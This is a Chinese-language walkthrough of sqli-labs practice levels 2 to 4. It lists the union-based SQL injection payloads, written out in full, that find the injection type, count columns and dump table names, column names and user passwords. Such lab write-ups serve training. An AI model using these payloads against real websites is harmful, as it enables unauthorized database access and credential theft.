进行第二关：

id=1 and 1=1回显正常 id=1 and1=2回显错误（判断为整形）

用order by语句爆出字段数------4出现错误，字段数为3

?id=1 order by 4

用union select 语句判断回显点

?id=-1 union select 1,2,3

爆出数据库

?id=-1 union select 1,2,database()

爆出所有表名

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

爆出所有字段名

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'

大家也可以根据特定的表名进行查询，看的比较清晰，如下

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'

爆出所需要的信息了

?id=-1 union select 1,2,group_concat(password) from users

第二关就结束啦，跟第一关类似，注入过程不变，只是参数注入类型发生改变

第三关

开始注入，判断参数注入类型

?id=1’) and 1=1--+回显正常?id=1’) and 1=2--+回显错误 判断为')型

接着用order by 语句猜解字段数---发现4错误，字段数为3

?id=1') oder by 4

用 union select 语句判断回显点

?id=-1') union select 1,2,3

爆出数据库

?id=-1') union select 1,2,database()--+

爆出所有表名

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆出所有字段名

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'--+

爆出所需要的数据

?id=-1') union select 1,2,group_concat(password) from users--+

第三关也结束啦，参数注入类型也发生改变，但是注入过程是不变的

第四关

参数注入类型发生改变

?id=1") and 1=1回显正常?id=1") and 1=2回显错误-----注入类型为")型

使用order by 语句猜解字段数---4出现错误，字段数为3

使用union select 判断回显点

?id=-1") union select 1,2,3--+

爆出数据库

?id=-1") union select 1,2,database()--+

爆出所有表名

?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

爆出所有字段名

?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'--+

爆出所需要的信息

?id=-1") union select 1,2,group_concat(password) from users--+

第四关到这里就结束啦，还是跟上面一样，只是参数注入类型发生改变